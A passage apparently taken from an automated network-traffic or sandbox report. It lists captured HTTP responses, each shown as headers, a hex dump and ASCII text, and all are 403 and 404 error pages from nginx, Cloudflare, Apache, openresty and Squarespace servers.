61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:13 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: C6tiMbOD/6lw9w0GgData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:13 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oYm92e0aO%2BIF124fuu2fZl0sFu%2FeFpAN0%2BL%2F7z656TxNu44Vcc76R8wR8Jnv0oB8hcxUoshEOyF7mE3gNDoVuAmxK9OKoAY6mRPAktcWhWoh%2F7WKWQSyESo2IY%2F9V10%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a816698d3a92-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=drUSZYxIuqvpXYicUdA92pnbSebUn7gbcEHFKHiX6Hy82CTgE1pX2WdNQni1nmhcbkUXLthwxfoGJ%2FsKOEpdzfDEZVQvA7A0EcSNnDbxOuGTRvmJr%2F8nuhmojem7YZoQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a817bd439208-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u90Pz9zAXqzXP5r06F%2B3KPgOBp824k2Ihg3ZCKGLUJEbhlHbZRlzT%2BkSIhhwvzUnmFg9WLEpMYsZtzNY5gJZLpxv9%2BOr%2BPoWoAwPsFiXpXIqIaDm%2BpY7eLYiVKv3kaQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a817eb073a92-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:14 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d1EVkp%2BZxJ1%2ByyFF2JrqdLBPZAMWLu13VQFCuMOKubTEr2wj0P1ie6RymjOpIbb7GhALc7aBKwJ5n%2Bj6FOdeOL%2Fz0XPrJud7x%2BiIQ%2BsYoZyH%2Fs6l72Wlj3JAXObkBuTJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a818de089208-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Fri, 10 Mar 2023 06:56:29 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NCLlGnKA7Eua2w6y9Ch%2BF3tiF142HF8xe4b15LH6WAIW23mK766Nr6CkZGUSGWU5cGzDaPFJja%2F47VEgoHyFbWPk29Uid3%2BZDxo7lrBnVjVtPJai%2BLVjU4DCCaKvgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8192b3791e4-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Fri, 10 Mar 2023 06:56:29 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zlLWhEkTTNmEW40zmiiiqt%2F1j3K10mx1afEeAmiu4f%2B1LDqSQalPullrEXBt7TFN%2BUms0tzXSVhzQMajkebJOHM3X4AkbTVZtmItUWQ5b1s6DZWoXvowEPcCLKOM3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a81a0a9e9119-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:14 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
